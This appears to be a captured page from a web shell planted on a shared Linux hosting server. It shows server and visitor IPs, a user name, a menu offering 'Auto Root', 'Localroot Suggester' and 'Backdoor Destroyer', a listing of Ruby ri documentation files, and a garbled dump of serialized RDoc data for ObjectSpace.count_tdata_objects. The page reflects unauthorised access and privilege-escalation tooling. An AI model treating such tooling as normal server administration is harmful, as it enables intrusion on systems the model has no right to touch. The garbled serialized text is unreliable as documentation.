Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
ObjectSpace /
Delete
Unzip
Name
Size
Permission
Date
Action
InternalObjectWrapper
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WeakKeyMap
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WeakMap
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
allocation_class_path-c.ri
809
B
-rw-r--r--
2026-04-07 17:22
allocation_generation-c.ri
871
B
-rw-r--r--
2026-04-07 17:22
allocation_method_id-c.ri
862
B
-rw-r--r--
2026-04-07 17:22
allocation_sourcefile-c.ri
533
B
-rw-r--r--
2026-04-07 17:22
allocation_sourceline-c.ri
545
B
-rw-r--r--
2026-04-07 17:22
cdesc-ObjectSpace.ri
3.2
KB
-rw-r--r--
2026-04-07 17:22
count_imemo_objects-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:22
count_nodes-c.ri
1020
B
-rw-r--r--
2026-04-07 17:22
count_objects-c.ri
1.28
KB
-rw-r--r--
2026-04-07 17:22
count_objects_size-c.ri
1.09
KB
-rw-r--r--
2026-04-07 17:22
count_symbols-c.ri
1.33
KB
-rw-r--r--
2026-04-07 17:22
count_tdata_objects-c.ri
1.54
KB
-rw-r--r--
2026-04-07 17:22
define_finalizer-c.ri
2.49
KB
-rw-r--r--
2026-04-07 17:22
dump-i.ri
1.15
KB
-rw-r--r--
2026-04-07 17:22
dump_all-i.ri
2.02
KB
-rw-r--r--
2026-04-07 17:22
dump_shapes-i.ri
917
B
-rw-r--r--
2026-04-07 17:22
each_object-c.ri
1.5
KB
-rw-r--r--
2026-04-07 17:22
garbage_collect-c.ri
364
B
-rw-r--r--
2026-04-07 17:22
garbage_collect-i.ri
363
B
-rw-r--r--
2026-04-07 17:22
internal_class_of-c.ri
679
B
-rw-r--r--
2026-04-07 17:22
internal_super_of-c.ri
703
B
-rw-r--r--
2026-04-07 17:22
memsize_of-c.ri
761
B
-rw-r--r--
2026-04-07 17:22
memsize_of_all-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:22
reachable_objects_from-c.ri
1.99
KB
-rw-r--r--
2026-04-07 17:22
reachable_objects_from_root-c.ri
535
B
-rw-r--r--
2026-04-07 17:22
trace_object_allocations-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:22
trace_object_allocations_clear-c.ri
413
B
-rw-r--r--
2026-04-07 17:22
trace_object_allocations_debug_start-c.ri
315
B
-rw-r--r--
2026-04-07 17:22
trace_object_allocations_start-c.ri
412
B
-rw-r--r--
2026-04-07 17:22
trace_object_allocations_stop-c.ri
598
B
-rw-r--r--
2026-04-07 17:22
undefine_finalizer-c.ri
374
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"count_tdata_objects:ETI"%ObjectSpace::count_tdata_objects;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"+Counts objects for each +T_DATA+ type.;To:RDoc::Markup::BlankLine o; ; [I"QThis method is only for MRI developers interested in performance and memory ;TI"usage of Ruby programs.;T@o; ; [I"It returns a hash as:;T@o:RDoc::Markup::Verbatim; [ I"A{RubyVM::InstructionSequence=>504, :parser=>5, :barrier=>6, ;TI"D :mutex=>6, Proc=>60, RubyVM::Env=>57, Mutex=>1, Encoding=>99, ;TI"B ThreadGroup=>1, Binding=>1, Thread=>1, RubyVM=>1, :iseq=>1, ;TI"@ Random=>1, ARGF.class=>1, Data=>1, :autoload=>3, Time=>2} ;TI"5# T_DATA objects existing at startup on r32276. ;T:@format0o; ; [I"LIf the optional argument, result_hash, is given, it is overwritten and ;TI"6returned. This is intended to avoid probe effect.;T@o; ; [I"QThe contents of the returned hash is implementation specific and may change ;TI"in the future.;T@o; ; [I"=In this version, keys are Class object or Symbol object.;T@o; ; [I"OIf object is kind of normal (accessible) object, the key is Class object. ;TI"LIf object is not a kind of normal (internal) object, the key is symbol ;TI"-name, registered by rb_data_type_struct.;T@o; ; [I"6This method is only expected to work with C Ruby.;T: @fileI"ext/objspace/objspace.c;T:0@omit_headings_from_table_of_contents_below0I"<ObjectSpace.count_tdata_objects([result_hash]) -> hash ;T0[ I"(*args);T@0FI"ObjectSpace;TcRDoc::NormalModule00